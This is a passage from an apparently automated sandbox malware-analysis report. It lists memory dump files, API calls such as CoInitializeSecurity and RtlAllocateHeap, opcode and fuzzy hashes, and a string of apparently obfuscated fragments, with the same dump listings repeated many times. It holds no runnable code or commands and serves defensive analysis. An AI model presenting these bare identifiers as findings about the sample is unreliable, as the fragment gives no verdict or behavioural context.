                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                        • Opcode ID: 18b8ffd1f01941b36bb0b4ea94c53f12a24029a15b2e101550930d03250da172
                                                                                                                                                                                                        • Instruction ID: 749f9fa0d3d7506fe952b02537f674ef48fd198769bfe04f112f119952d4e3a8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18b8ffd1f01941b36bb0b4ea94c53f12a24029a15b2e101550930d03250da172
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75C092303E4302BAF6320A19ACA7F1A7175B793F02F701804B7407C0D08EF66224AA9E

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 535 562f6f-562f87 CoInitializeSecurity
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00562F82
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                        • Opcode ID: dd0263774c638d4df2670c3cf456897b247b0b5772315c8991bd84aa93f37b0a
                                                                                                                                                                                                        • Instruction ID: 7b58b714c4cafcf4431613d0c51ee0ac59274b93af1fb37adb7ecb0e3de5b920
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd0263774c638d4df2670c3cf456897b247b0b5772315c8991bd84aa93f37b0a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55C092313D8305B0F03006086C63F0520045302F20F700B11B330BC1D089D53104921C
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 00593208
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: cebc1b507502f12eeadccc6945fcc879ad4b214525f708c9ec9e497580c10183
                                                                                                                                                                                                        • Instruction ID: f3f3affba7d33e358244665b3235d1ae74aeaa5cd08133ce82cb834a9c7e2afe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cebc1b507502f12eeadccc6945fcc879ad4b214525f708c9ec9e497580c10183
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56B012340400005FDA082B00EC0AF003520EB10605F800050E501040B1D1715868D564
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00562F5F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                        • Opcode ID: 458690e42c98b4ecc1730d9a881c66995c8a7c5b6ed3e6e4c191ede83ae5607b
                                                                                                                                                                                                        • Instruction ID: 8172bd64850df4f250cbf4b2bbbb3746a4aacbb80c8fb18d19068cd4005f8c72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 458690e42c98b4ecc1730d9a881c66995c8a7c5b6ed3e6e4c191ede83ae5607b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0F019A5D117006BD7707A3D9E0B7177D78A706660F400729ECE5567C4F620A41DCBD7
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                                                                                                                                                                        • API String ID: 2994545307-1418943773
                                                                                                                                                                                                        • Opcode ID: ac0f382cdd2e7b4e5e20e6145953f0b202b82f2002050b97901757bf9c143d4c
                                                                                                                                                                                                        • Instruction ID: 620215beb89509270491d25f10cd742cf9258103a224c3e55114386bce1c0469
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac0f382cdd2e7b4e5e20e6145953f0b202b82f2002050b97901757bf9c143d4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49F276B45093829BD770CF14D885BABBBE6BFD5344F144C2CE4C98B252EB319984DB92
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
